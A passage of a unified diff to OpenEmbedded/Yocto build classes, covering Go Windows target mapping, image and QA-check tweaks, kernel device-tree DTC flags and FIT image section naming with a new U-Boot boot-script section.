118 tar -C ${B} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' pkg | \ 118 tar -C ${B} -cf - --exclude-vcs --exclude '*.test' --exclude 'testdata' pkg | \
119 tar -C ${D}${libdir}/go --no-same-owner -xf - 119 tar -C ${D}${libdir}/go --no-same-owner -xf -
120 120
121 if [ -n "`ls ${B}/${GO_BUILD_BINDIR}/`" ]; then 121 if ls ${B}/${GO_BUILD_BINDIR}/* >/dev/null 2>/dev/null ; then
122 install -d ${D}${bindir} 122 install -d ${D}${bindir}
123 install -m 0755 ${B}/${GO_BUILD_BINDIR}/* ${D}${bindir}/ 123 install -m 0755 ${B}/${GO_BUILD_BINDIR}/* ${D}${bindir}/
124 fi 124 fi
@@ -145,11 +145,11 @@ FILES_${PN}-staticdev = "${libdir}/go/pkg"
145 145
146INSANE_SKIP_${PN} += "ldflags" 146INSANE_SKIP_${PN} += "ldflags"
147 147
148# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but mips 148# Add -buildmode=pie to GOBUILDFLAGS to satisfy "textrel" QA checking, but
149# doesn't support -buildmode=pie, so skip the QA checking for mips and its 149# windows/mips/riscv doesn't support -buildmode=pie, so skip the QA checking
150# variants. 150# for windows/mips/riscv and their variants.
151python() { 151python() {
152 if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH'): 152 if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
153 d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel") 153 d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
154 else: 154 else:
155 d.appendVar('GOBUILDFLAGS', ' -buildmode=pie') 155 d.appendVar('GOBUILDFLAGS', ' -buildmode=pie')
diff --git a/meta/classes/goarch.bbclass b/meta/classes/goarch.bbclass
index 1099b95769..ecd3044edd 100644
--- a/meta/classes/goarch.bbclass
+++ b/meta/classes/goarch.bbclass
@@ -114,6 +114,8 @@ def go_map_mips(a, f, d):
114def go_map_os(o, d): 114def go_map_os(o, d):
115 if o.startswith('linux'): 115 if o.startswith('linux'):
116 return 'linux' 116 return 'linux'
117 elif o.startswith('mingw'):
118 return 'windows'
117 return o 119 return o
118 120
119 121
diff --git a/meta/classes/image-live.bbclass b/meta/classes/image-live.bbclass
index 54058b350d..2fa839b0de 100644
--- a/meta/classes/image-live.bbclass
+++ b/meta/classes/image-live.bbclass
@@ -30,7 +30,7 @@ do_bootimg[depends] += "dosfstools-native:do_populate_sysroot \
30 virtual/kernel:do_deploy \ 30 virtual/kernel:do_deploy \
31 ${MLPREFIX}syslinux:do_populate_sysroot \ 31 ${MLPREFIX}syslinux:do_populate_sysroot \
32 syslinux-native:do_populate_sysroot \ 32 syslinux-native:do_populate_sysroot \
33 ${PN}:do_image_${@d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')} \ 33 ${@'%s:do_image_%s' % (d.getVar('PN'), d.getVar('LIVE_ROOTFS_TYPE').replace('-', '_')) if d.getVar('ROOTFS') else ''} \
34 " 34 "
35 35
36 36
@@ -261,4 +261,4 @@ python do_bootimg() {
261do_bootimg[subimages] = "hddimg iso" 261do_bootimg[subimages] = "hddimg iso"
262do_bootimg[imgsuffix] = "." 262do_bootimg[imgsuffix] = "."
263 263
264addtask bootimg before do_image_complete 264addtask bootimg before do_image_complete after do_rootfs
diff --git a/meta/classes/image.bbclass b/meta/classes/image.bbclass
index 459d872b4a..fbf7206d04 100644
--- a/meta/classes/image.bbclass
+++ b/meta/classes/image.bbclass
@@ -38,7 +38,7 @@ IMAGE_FEATURES[validitems] += "debug-tweaks read-only-rootfs stateless-rootfs em
38# Generate companion debugfs? 38# Generate companion debugfs?
39IMAGE_GEN_DEBUGFS ?= "0" 39IMAGE_GEN_DEBUGFS ?= "0"
40 40
41# These pacackages will be installed as additional into debug rootfs 41# These packages will be installed as additional into debug rootfs
42IMAGE_INSTALL_DEBUGFS ?= "" 42IMAGE_INSTALL_DEBUGFS ?= ""
43 43
44# These packages will be removed from a read-only rootfs after all other 44# These packages will be removed from a read-only rootfs after all other
@@ -115,7 +115,7 @@ def rootfs_command_variables(d):
115 'IMAGE_PREPROCESS_COMMAND','RPM_PREPROCESS_COMMANDS','RPM_POSTPROCESS_COMMANDS','DEB_PREPROCESS_COMMANDS','DEB_POSTPROCESS_COMMANDS'] 115 'IMAGE_PREPROCESS_COMMAND','RPM_PREPROCESS_COMMANDS','RPM_POSTPROCESS_COMMANDS','DEB_PREPROCESS_COMMANDS','DEB_POSTPROCESS_COMMANDS']
116 116
117python () { 117python () {
118 variables = rootfs_command_variables(d) + sdk_command_variables(d) 118 variables = rootfs_command_variables(d)
119 for var in variables: 119 for var in variables:
120 if d.getVar(var, False): 120 if d.getVar(var, False):
121 d.setVarFlag(var, 'func', '1') 121 d.setVarFlag(var, 'func', '1')
@@ -124,7 +124,7 @@ python () {
124def rootfs_variables(d): 124def rootfs_variables(d):
125 from oe.rootfs import variable_depends 125 from oe.rootfs import variable_depends
126 variables = ['IMAGE_DEVICE_TABLE','IMAGE_DEVICE_TABLES','BUILD_IMAGES_FROM_FEEDS','IMAGE_TYPES_MASKED','IMAGE_ROOTFS_ALIGNMENT','IMAGE_OVERHEAD_FACTOR','IMAGE_ROOTFS_SIZE','IMAGE_ROOTFS_EXTRA_SPACE', 126 variables = ['IMAGE_DEVICE_TABLE','IMAGE_DEVICE_TABLES','BUILD_IMAGES_FROM_FEEDS','IMAGE_TYPES_MASKED','IMAGE_ROOTFS_ALIGNMENT','IMAGE_OVERHEAD_FACTOR','IMAGE_ROOTFS_SIZE','IMAGE_ROOTFS_EXTRA_SPACE',
127 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY', 127 'IMAGE_ROOTFS_MAXSIZE','IMAGE_NAME','IMAGE_LINK_NAME','IMAGE_MANIFEST','DEPLOY_DIR_IMAGE','IMAGE_FSTYPES','IMAGE_INSTALL_COMPLEMENTARY','IMAGE_LINGUAS', 'IMAGE_LINGUAS_COMPLEMENTARY', 'IMAGE_LOCALES_ARCHIVE',
128 'MULTILIBRE_ALLOW_REP','MULTILIB_TEMP_ROOTFS','MULTILIB_VARIANTS','MULTILIBS','ALL_MULTILIB_PACKAGE_ARCHS','MULTILIB_GLOBAL_VARIANTS','BAD_RECOMMENDATIONS','NO_RECOMMENDATIONS', 128 'MULTILIBRE_ALLOW_REP','MULTILIB_TEMP_ROOTFS','MULTILIB_VARIANTS','MULTILIBS','ALL_MULTILIB_PACKAGE_ARCHS','MULTILIB_GLOBAL_VARIANTS','BAD_RECOMMENDATIONS','NO_RECOMMENDATIONS',
129 'PACKAGE_ARCHS','PACKAGE_CLASSES','TARGET_VENDOR','TARGET_ARCH','TARGET_OS','OVERRIDES','BBEXTENDVARIANT','FEED_DEPLOYDIR_BASE_URI','INTERCEPT_DIR','USE_DEVFS', 129 'PACKAGE_ARCHS','PACKAGE_CLASSES','TARGET_VENDOR','TARGET_ARCH','TARGET_OS','OVERRIDES','BBEXTENDVARIANT','FEED_DEPLOYDIR_BASE_URI','INTERCEPT_DIR','USE_DEVFS',
130 'CONVERSIONTYPES', 'IMAGE_GEN_DEBUGFS', 'ROOTFS_RO_UNNEEDED', 'IMGDEPLOYDIR', 'PACKAGE_EXCLUDE_COMPLEMENTARY', 'REPRODUCIBLE_TIMESTAMP_ROOTFS', 'IMAGE_INSTALL_DEBUGFS'] 130 'CONVERSIONTYPES', 'IMAGE_GEN_DEBUGFS', 'ROOTFS_RO_UNNEEDED', 'IMGDEPLOYDIR', 'PACKAGE_EXCLUDE_COMPLEMENTARY', 'REPRODUCIBLE_TIMESTAMP_ROOTFS', 'IMAGE_INSTALL_DEBUGFS']
@@ -176,10 +176,15 @@ IMAGE_LINGUAS ?= "de-de fr-fr en-gb"
176 176
177LINGUAS_INSTALL ?= "${@" ".join(map(lambda s: "locale-base-%s" % s, d.getVar('IMAGE_LINGUAS').split()))}" 177LINGUAS_INSTALL ?= "${@" ".join(map(lambda s: "locale-base-%s" % s, d.getVar('IMAGE_LINGUAS').split()))}"
178 178
179# per default create a locale archive
180IMAGE_LOCALES_ARCHIVE ?= '1'
181
179# Prefer image, but use the fallback files for lookups if the image ones 182# Prefer image, but use the fallback files for lookups if the image ones
180# aren't yet available. 183# aren't yet available.
181PSEUDO_PASSWD = "${IMAGE_ROOTFS}:${STAGING_DIR_NATIVE}" 184PSEUDO_PASSWD = "${IMAGE_ROOTFS}:${STAGING_DIR_NATIVE}"
182 185
186PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/intercept_scripts,${WORKDIR}/oe-rootfs-repo,${WORKDIR}/sstate-build-image_complete"
187
183PACKAGE_EXCLUDE ??= "" 188PACKAGE_EXCLUDE ??= ""
184PACKAGE_EXCLUDE[type] = "list" 189PACKAGE_EXCLUDE[type] = "list"
185 190
@@ -306,7 +311,7 @@ fakeroot python do_image_qa () {
306 except oe.utils.ImageQAFailed as e: 311 except oe.utils.ImageQAFailed as e:
307 qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (e.name, e.description) 312 qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (e.name, e.description)
308 except Exception as e: 313 except Exception as e:
309 qamsg = qamsg + '\tImage QA function %s failed\n' % cmd 314 qamsg = qamsg + '\tImage QA function %s failed: %s\n' % (cmd, e)
310 315
311 if qamsg: 316 if qamsg:
312 imgname = d.getVar('IMAGE_NAME') 317 imgname = d.getVar('IMAGE_NAME')
@@ -432,7 +437,7 @@ python () {
432 localdata.delVar('DATETIME') 437 localdata.delVar('DATETIME')
433 localdata.delVar('DATE') 438 localdata.delVar('DATE')
434 localdata.delVar('TMPDIR') 439 localdata.delVar('TMPDIR')
435 vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude', True) or '').split() 440 vardepsexclude = (d.getVarFlag('IMAGE_CMD_' + realt, 'vardepsexclude') or '').split()
436 for dep in vardepsexclude: 441 for dep in vardepsexclude:
437 localdata.delVar(dep) 442 localdata.delVar(dep)
438 443
@@ -660,7 +665,7 @@ reproducible_final_image_task () {
660 fi 665 fi
661 # Set mtime of all files to a reproducible value 666 # Set mtime of all files to a reproducible value
662 bbnote "reproducible_final_image_task: mtime set to $REPRODUCIBLE_TIMESTAMP_ROOTFS" 667 bbnote "reproducible_final_image_task: mtime set to $REPRODUCIBLE_TIMESTAMP_ROOTFS"
663 find ${IMAGE_ROOTFS} -exec touch -h --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS {} \; 668 find ${IMAGE_ROOTFS} -print0 | xargs -0 touch -h --date=@$REPRODUCIBLE_TIMESTAMP_ROOTFS
664 fi 669 fi
665} 670}
666 671
diff --git a/meta/classes/image_types.bbclass b/meta/classes/image_types.bbclass
index ff42ac9423..6dc0e094d0 100644
--- a/meta/classes/image_types.bbclass
+++ b/meta/classes/image_types.bbclass
@@ -240,7 +240,7 @@ EXTRA_IMAGECMD_jffs2 ?= "--pad ${JFFS2_ENDIANNESS} --eraseblock=${JFFS2_ERASEBLO
240EXTRA_IMAGECMD_ext2 ?= "-i 4096" 240EXTRA_IMAGECMD_ext2 ?= "-i 4096"
241EXTRA_IMAGECMD_ext3 ?= "-i 4096" 241EXTRA_IMAGECMD_ext3 ?= "-i 4096"
242EXTRA_IMAGECMD_ext4 ?= "-i 4096" 242EXTRA_IMAGECMD_ext4 ?= "-i 4096"
243EXTRA_IMAGECMD_btrfs ?= "-n 4096" 243EXTRA_IMAGECMD_btrfs ?= "-n 4096 --shrink"
244EXTRA_IMAGECMD_f2fs ?= "" 244EXTRA_IMAGECMD_f2fs ?= ""
245 245
246do_image_cpio[depends] += "cpio-native:do_populate_sysroot" 246do_image_cpio[depends] += "cpio-native:do_populate_sysroot"
diff --git a/meta/classes/insane.bbclass b/meta/classes/insane.bbclass
index b5c6b2186f..d6da53252f 100644
--- a/meta/classes/insane.bbclass
+++ b/meta/classes/insane.bbclass
@@ -174,7 +174,7 @@ def package_qa_check_useless_rpaths(file, name, d, elf, messages):
174 if rpath_eq(rpath, libdir) or rpath_eq(rpath, base_libdir): 174 if rpath_eq(rpath, libdir) or rpath_eq(rpath, base_libdir):
175 # The dynamic linker searches both these places anyway. There is no point in 175 # The dynamic linker searches both these places anyway. There is no point in
176 # looking there again. 176 # looking there again.
177 package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d), rpath)) 177 package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d, name), rpath))
178 178
179QAPATHTEST[dev-so] = "package_qa_check_dev" 179QAPATHTEST[dev-so] = "package_qa_check_dev"
180def package_qa_check_dev(path, name, d, elf, messages): 180def package_qa_check_dev(path, name, d, elf, messages):
@@ -183,8 +183,8 @@ def package_qa_check_dev(path, name, d, elf, messages):
183 """ 183 """
184 184
185 if not name.endswith("-dev") and not name.endswith("-dbg") and not name.endswith("-ptest") and not name.startswith("nativesdk-") and path.endswith(".so") and os.path.islink(path): 185 if not name.endswith("-dev") and not name.endswith("-dbg") and not name.endswith("-ptest") and not name.startswith("nativesdk-") and path.endswith(".so") and os.path.islink(path):
186 package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package contains symlink .so: %s path '%s'" % \ 186 package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package %s contains symlink .so '%s'" % \
187 (name, package_qa_clean_path(path,d))) 187 (name, package_qa_clean_path(path, d, name)))
188 188
189QAPATHTEST[dev-elf] = "package_qa_check_dev_elf" 189QAPATHTEST[dev-elf] = "package_qa_check_dev_elf"
190def package_qa_check_dev_elf(path, name, d, elf, messages): 190def package_qa_check_dev_elf(path, name, d, elf, messages):
@@ -194,8 +194,8 @@ def package_qa_check_dev_elf(path, name, d, elf, messages):
194 install link-time .so files that are linker scripts. 194 install link-time .so files that are linker scripts.
195 """ 195 """
196 if name.endswith("-dev") and path.endswith(".so") and not os.path.islink(path) and elf: 196 if name.endswith("-dev") and path.endswith(".so") and not os.path.islink(path) and elf:
197 package_qa_add_message(messages, "dev-elf", "-dev package contains non-symlink .so: %s path '%s'" % \ 197 package_qa_add_message(messages, "dev-elf", "-dev package %s contains non-symlink .so '%s'" % \
198 (name, package_qa_clean_path(path,d))) 198 (name, package_qa_clean_path(path, d, name)))
199 199
200QAPATHTEST[staticdev] = "package_qa_check_staticdev" 200QAPATHTEST[staticdev] = "package_qa_check_staticdev"
201def package_qa_check_staticdev(path, name, d, elf, messages): 201def package_qa_check_staticdev(path, name, d, elf, messages):
@@ -208,7 +208,7 @@ def package_qa_check_staticdev(path, name, d, elf, messages):
208 208
209 if not name.endswith("-pic") and not name.endswith("-staticdev") and not name.endswith("-ptest") and path.endswith(".a") and not path.endswith("_nonshared.a") and not '/usr/lib/debug-static/' in path and not '/.debug-static/' in path: 209 if not name.endswith("-pic") and not name.endswith("-staticdev") and not name.endswith("-ptest") and path.endswith(".a") and not path.endswith("_nonshared.a") and not '/usr/lib/debug-static/' in path and not '/.debug-static/' in path:
210 package_qa_add_message(messages, "staticdev", "non -staticdev package contains static .a library: %s path '%s'" % \ 210 package_qa_add_message(messages, "staticdev", "non -staticdev package contains static .a library: %s path '%s'" % \
211 (name, package_qa_clean_path(path,d))) 211 (name, package_qa_clean_path(path,d, name)))
212 212
213QAPATHTEST[mime] = "package_qa_check_mime" 213QAPATHTEST[mime] = "package_qa_check_mime"
214def package_qa_check_mime(path, name, d, elf, messages): 214def package_qa_check_mime(path, name, d, elf, messages):
@@ -452,12 +452,14 @@ def package_qa_check_buildpaths(path, name, d, elf, messages):
452 """ 452 """
453 Check for build paths inside target files and error if not found in the whitelist 453 Check for build paths inside target files and error if not found in the whitelist
454 """ 454 """
455 import stat
455 # Ignore .debug files, not interesting 456 # Ignore .debug files, not interesting
456 if path.find(".debug") != -1: 457 if path.find(".debug") != -1:
457 return 458 return
458 459
459 # Ignore symlinks 460 # Ignore symlinks/devs/fifos
460 if os.path.islink(path): 461 mode = os.lstat(path).st_mode
462 if stat.S_ISLNK(mode) or stat.S_ISBLK(mode) or stat.S_ISFIFO(mode) or stat.S_ISCHR(mode) or stat.S_ISSOCK(mode):
461 return 463 return
462 464
463 tmpdir = bytes(d.getVar('TMPDIR'), encoding="utf-8") 465 tmpdir = bytes(d.getVar('TMPDIR'), encoding="utf-8")
@@ -945,7 +947,7 @@ def package_qa_check_host_user(path, name, d, elf, messages):
945 947
946 dest = d.getVar('PKGDEST') 948 dest = d.getVar('PKGDEST')
947 pn = d.getVar('PN') 949 pn = d.getVar('PN')
948 home = os.path.join(dest, 'home') 950 home = os.path.join(dest, name, 'home')
949 if path == home or path.startswith(home + os.sep): 951 if path == home or path.startswith(home + os.sep):
950 return 952 return
951 953
@@ -1012,26 +1014,6 @@ python do_package_qa () {
1012 logdir = d.getVar('T') 1014 logdir = d.getVar('T')
1013 pn = d.getVar('PN') 1015 pn = d.getVar('PN')
1014 1016
1015 # Check the compile log for host contamination
1016 compilelog = os.path.join(logdir,"log.do_compile")
1017
1018 if os.path.exists(compilelog):
1019 statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % compilelog
1020 if subprocess.call(statement, shell=True) == 0:
1021 msg = "%s: The compile log indicates that host include and/or library paths were used.\n \
1022 Please check the log '%s' for more information." % (pn, compilelog)
1023 package_qa_handle_error("compile-host-path", msg, d)
1024
1025 # Check the install log for host contamination
1026 installlog = os.path.join(logdir,"log.do_install")
1027
1028 if os.path.exists(installlog):
1029 statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % installlog
1030 if subprocess.call(statement, shell=True) == 0:
1031 msg = "%s: The install log indicates that host include and/or library paths were used.\n \
1032 Please check the log '%s' for more information." % (pn, installlog)
1033 package_qa_handle_error("install-host-path", msg, d)
1034
1035 # Scan the packages... 1017 # Scan the packages...
1036 pkgdest = d.getVar('PKGDEST') 1018 pkgdest = d.getVar('PKGDEST')
1037 packages = set((d.getVar('PACKAGES') or '').split()) 1019 packages = set((d.getVar('PACKAGES') or '').split())
@@ -1210,7 +1192,7 @@ python do_qa_configure() {
1210 if bb.data.inherits_class('autotools', d) and not skip_configure_unsafe: 1192 if bb.data.inherits_class('autotools', d) and not skip_configure_unsafe:
1211 bb.note("Checking autotools environment for common misconfiguration") 1193 bb.note("Checking autotools environment for common misconfiguration")
1212 for root, dirs, files in os.walk(workdir): 1194 for root, dirs, files in os.walk(workdir):
1213 statement = "grep -q -F -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s" % \ 1195 statement = "grep -q -F -e 'is unsafe for cross-compilation' %s" % \
1214 os.path.join(root,"config.log") 1196 os.path.join(root,"config.log")
1215 if "config.log" in files: 1197 if "config.log" in files:
1216 if subprocess.call(statement, shell=True) == 0: 1198 if subprocess.call(statement, shell=True) == 0:
diff --git a/meta/classes/kernel-arch.bbclass b/meta/classes/kernel-arch.bbclass
index 07ec242e63..4cd08b96fb 100644
--- a/meta/classes/kernel-arch.bbclass
+++ b/meta/classes/kernel-arch.bbclass
@@ -61,8 +61,8 @@ HOST_LD_KERNEL_ARCH ?= "${TARGET_LD_KERNEL_ARCH}"
61TARGET_AR_KERNEL_ARCH ?= "" 61TARGET_AR_KERNEL_ARCH ?= ""
62HOST_AR_KERNEL_ARCH ?= "${TARGET_AR_KERNEL_ARCH}" 62HOST_AR_KERNEL_ARCH ?= "${TARGET_AR_KERNEL_ARCH}"
63 63
64KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH}" 64KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH} -fdebug-prefix-map=${STAGING_KERNEL_BUILDDIR}=${KERNEL_SRC_PATH}"
65KERNEL_LD = "${CCACHE}${HOST_PREFIX}ld.bfd ${HOST_LD_KERNEL_ARCH}" 65KERNEL_LD = "${CCACHE}${HOST_PREFIX}ld.bfd ${HOST_LD_KERNEL_ARCH}"
66KERNEL_AR = "${CCACHE}${HOST_PREFIX}ar ${HOST_AR_KERNEL_ARCH}" 66KERNEL_AR = "${CCACHE}${HOST_PREFIX}ar ${HOST_AR_KERNEL_ARCH}"
67TOOLCHAIN = "gcc" 67TOOLCHAIN ?= "gcc"
68 68
diff --git a/meta/classes/kernel-devicetree.bbclass b/meta/classes/kernel-devicetree.bbclass
index 81dda8003f..27a4905ac6 100644
--- a/meta/classes/kernel-devicetree.bbclass
+++ b/meta/classes/kernel-devicetree.bbclass
@@ -1,14 +1,20 @@
1# Support for device tree generation 1# Support for device tree generation
2PACKAGES_append = " \ 2python () {
3 ${KERNEL_PACKAGE_NAME}-devicetree \ 3 if not bb.data.inherits_class('nopackages', d):
4 ${@[d.getVar('KERNEL_PACKAGE_NAME') + '-image-zimage-bundle', ''][d.getVar('KERNEL_DEVICETREE_BUNDLE') != '1']} \ 4 d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-devicetree")
5" 5 if d.getVar('KERNEL_DEVICETREE_BUNDLE') == '1':
6 d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-image-zimage-bundle")
7}
8
6FILES_${KERNEL_PACKAGE_NAME}-devicetree = "/${KERNEL_IMAGEDEST}/*.dtb /${KERNEL_IMAGEDEST}/*.dtbo" 9FILES_${KERNEL_PACKAGE_NAME}-devicetree = "/${KERNEL_IMAGEDEST}/*.dtb /${KERNEL_IMAGEDEST}/*.dtbo"
7FILES_${KERNEL_PACKAGE_NAME}-image-zimage-bundle = "/${KERNEL_IMAGEDEST}/zImage-*.dtb.bin" 10FILES_${KERNEL_PACKAGE_NAME}-image-zimage-bundle = "/${KERNEL_IMAGEDEST}/zImage-*.dtb.bin"
8 11
9# Generate kernel+devicetree bundle 12# Generate kernel+devicetree bundle
10KERNEL_DEVICETREE_BUNDLE ?= "0" 13KERNEL_DEVICETREE_BUNDLE ?= "0"
11 14
15# dtc flags passed via DTC_FLAGS env variable
16KERNEL_DTC_FLAGS ?= ""
17
12normalize_dtb () { 18normalize_dtb () {
13 dtb="$1" 19 dtb="$1"
14 if echo $dtb | grep -q '/dts/'; then 20 if echo $dtb | grep -q '/dts/'; then
@@ -50,6 +56,10 @@ do_configure_append() {
50} 56}
51 57
52do_compile_append() { 58do_compile_append() {
59 if [ -n "${KERNEL_DTC_FLAGS}" ]; then
60 export DTC_FLAGS="${KERNEL_DTC_FLAGS}"
61 fi
62
53 for dtbf in ${KERNEL_DEVICETREE}; do 63 for dtbf in ${KERNEL_DEVICETREE}; do
54 dtb=`normalize_dtb "$dtbf"` 64 dtb=`normalize_dtb "$dtbf"`
55 oe_runmake $dtb CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS} 65 oe_runmake $dtb CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS}
diff --git a/meta/classes/kernel-fitimage.bbclass b/meta/classes/kernel-fitimage.bbclass
index 72b05ff8d1..7c7bcd3fc0 100644
--- a/meta/classes/kernel-fitimage.bbclass
+++ b/meta/classes/kernel-fitimage.bbclass
@@ -1,5 +1,7 @@
1inherit kernel-uboot kernel-artifact-names uboot-sign 1inherit kernel-uboot kernel-artifact-names uboot-sign
2 2
3KERNEL_IMAGETYPE_REPLACEMENT = ""
4
3python __anonymous () { 5python __anonymous () {
4 kerneltypes = d.getVar('KERNEL_IMAGETYPES') or "" 6 kerneltypes = d.getVar('KERNEL_IMAGETYPES') or ""
5 if 'fitImage' in kerneltypes.split(): 7 if 'fitImage' in kerneltypes.split():
@@ -21,6 +23,8 @@ python __anonymous () {
21 else: 23 else:
22 replacementtype = "zImage" 24 replacementtype = "zImage"
23 25
26 d.setVar("KERNEL_IMAGETYPE_REPLACEMENT", replacementtype)
27
24 # Override KERNEL_IMAGETYPE_FOR_MAKE variable, which is internal 28 # Override KERNEL_IMAGETYPE_FOR_MAKE variable, which is internal
25 # to kernel.bbclass . We have to override it, since we pack zImage 29 # to kernel.bbclass . We have to override it, since we pack zImage
26 # (at least for now) into the fitImage . 30 # (at least for now) into the fitImage .
@@ -45,6 +49,8 @@ python __anonymous () {
45 if d.getVar('UBOOT_SIGN_ENABLE') == "1" and d.getVar('UBOOT_DTB_BINARY'): 49 if d.getVar('UBOOT_SIGN_ENABLE') == "1" and d.getVar('UBOOT_DTB_BINARY'):
46 uboot_pn = d.getVar('PREFERRED_PROVIDER_u-boot') or 'u-boot' 50 uboot_pn = d.getVar('PREFERRED_PROVIDER_u-boot') or 'u-boot'
47 d.appendVarFlag('do_assemble_fitimage', 'depends', ' %s:do_populate_sysroot' % uboot_pn) 51 d.appendVarFlag('do_assemble_fitimage', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
52 if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
53 d.appendVarFlag('do_assemble_fitimage_initramfs', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
48} 54}
49 55
50# Options for the device tree compiler passed to mkimage '-D' feature: 56# Options for the device tree compiler passed to mkimage '-D' feature:
@@ -56,6 +62,12 @@ FIT_HASH_ALG ?= "sha256"
56# fitImage Signature Algo 62# fitImage Signature Algo
57FIT_SIGN_ALG ?= "rsa2048" 63FIT_SIGN_ALG ?= "rsa2048"
58 64
65# fitImage Padding Algo
66FIT_PAD_ALG ?= "pkcs-1.5"
67
68# Arguments passed to mkimage for signing
69UBOOT_MKIMAGE_SIGN_ARGS ?= ""
70
59# 71#
60# Emit the fitImage ITS header 72# Emit the fitImage ITS header
61# 73#
@@ -124,7 +136,7 @@ fitimage_emit_section_kernel() {
124 fi 136 fi
125 137
126 cat << EOF >> ${1} 138 cat << EOF >> ${1}
127 kernel@${2} { 139 kernel-${2} {
128 description = "Linux kernel"; 140 description = "Linux kernel";
129 data = /incbin/("${3}"); 141 data = /incbin/("${3}");
130 type = "kernel"; 142 type = "kernel";
@@ -133,7 +145,7 @@ fitimage_emit_section_kernel() {
133 compression = "${4}"; 145 compression = "${4}";
134 load = <${UBOOT_LOADADDRESS}>; 146 load = <${UBOOT_LOADADDRESS}>;
135 entry = <${ENTRYPOINT}>; 147 entry = <${ENTRYPOINT}>;
136 hash@1 { 148 hash-1 {
137 algo = "${kernel_csum}"; 149 algo = "${kernel_csum}";
138 }; 150 };
139 }; 151 };
@@ -160,14 +172,14 @@ fitimage_emit_section_dtb() {
160 dtb_loadline="load = <${UBOOT_DTB_LOADADDRESS}>;" 172 dtb_loadline="load = <${UBOOT_DTB_LOADADDRESS}>;"
161 fi 173 fi
162 cat << EOF >> ${1} 174 cat << EOF >> ${1}
163 fdt@${2} { 175 fdt-${2} {
164 description = "Flattened Device Tree blob"; 176 description = "Flattened Device Tree blob";
165 data = /incbin/("${3}"); 177 data = /incbin/("${3}");
166 type = "flat_dt"; 178 type = "flat_dt";
167 arch = "${UBOOT_ARCH}"; 179 arch = "${UBOOT_ARCH}";
168 compression = "none"; 180 compression = "none";
169 ${dtb_loadline} 181 ${dtb_loadline}
170 hash@1 { 182 hash-1 {
171 algo = "${dtb_csum}"; 183 algo = "${dtb_csum}";
172 }; 184 };
173 }; 185 };
@@ -175,6 +187,43 @@ EOF
175} 187}
176 188
177# 189#
190# Emit the fitImage ITS u-boot script section
191#
192# $1 ... .its filename
193# $2 ... Image counter
194# $3 ... Path to boot script image
195fitimage_emit_section_boot_script() {
196
197 bootscr_csum="${FIT_HASH_ALG}"
198 bootscr_sign_algo="${FIT_SIGN_ALG}"
199 bootscr_sign_keyname="${UBOOT_SIGN_IMG_KEYNAME}"
200
201 cat << EOF >> $1
202 bootscr-$2 {
203 description = "U-boot script";
204 data = /incbin/("$3");
205 type = "script";
206 arch = "${UBOOT_ARCH}";
207 compression = "none";
208 hash-1 {
209 algo = "$bootscr_csum";
210 };
211 };
212EOF
213
214 if [ "${UBOOT_SIGN_ENABLE}" = "1" -a "${FIT_SIGN_INDIVIDUAL}" = "1" -a -n "$bootscr_sign_keyname" ] ; then
215 sed -i '$ d' $1
216 cat << EOF >> $1
217 signature-1 {
218 algo = "$bootscr_csum,$bootscr_sign_algo";
219 key-name-hint = "$bootscr_sign_keyname";
220 };
221 };
222EOF
223 fi
224}
225
226#
178# Emit the fitImage ITS setup section 227# Emit the fitImage ITS setup section
179# 228#
180# $1 ... .its filename 229# $1 ... .its filename
@@ -185,7 +234,7 @@ fitimage_emit_section_setup() {
185 setup_csum="${FIT_HASH_ALG}" 234 setup_csum="${FIT_HASH_ALG}"
186 235
187 cat << EOF >> ${1} 236 cat << EOF >> ${1}
188 setup@${2} { 237 setup-${2} {
189 description = "Linux setup.bin"; 238 description = "Linux setup.bin";
190 data = /incbin/("${3}"); 239 data = /incbin/("${3}");
191 type = "x86_setup"; 240 type = "x86_setup";
@@ -194,7 +243,7 @@ fitimage_emit_section_setup() {
194 compression = "none"; 243 compression = "none";
195 load = <0x00090000>; 244 load = <0x00090000>;
196 entry = <0x00090000>; 245 entry = <0x00090000>;
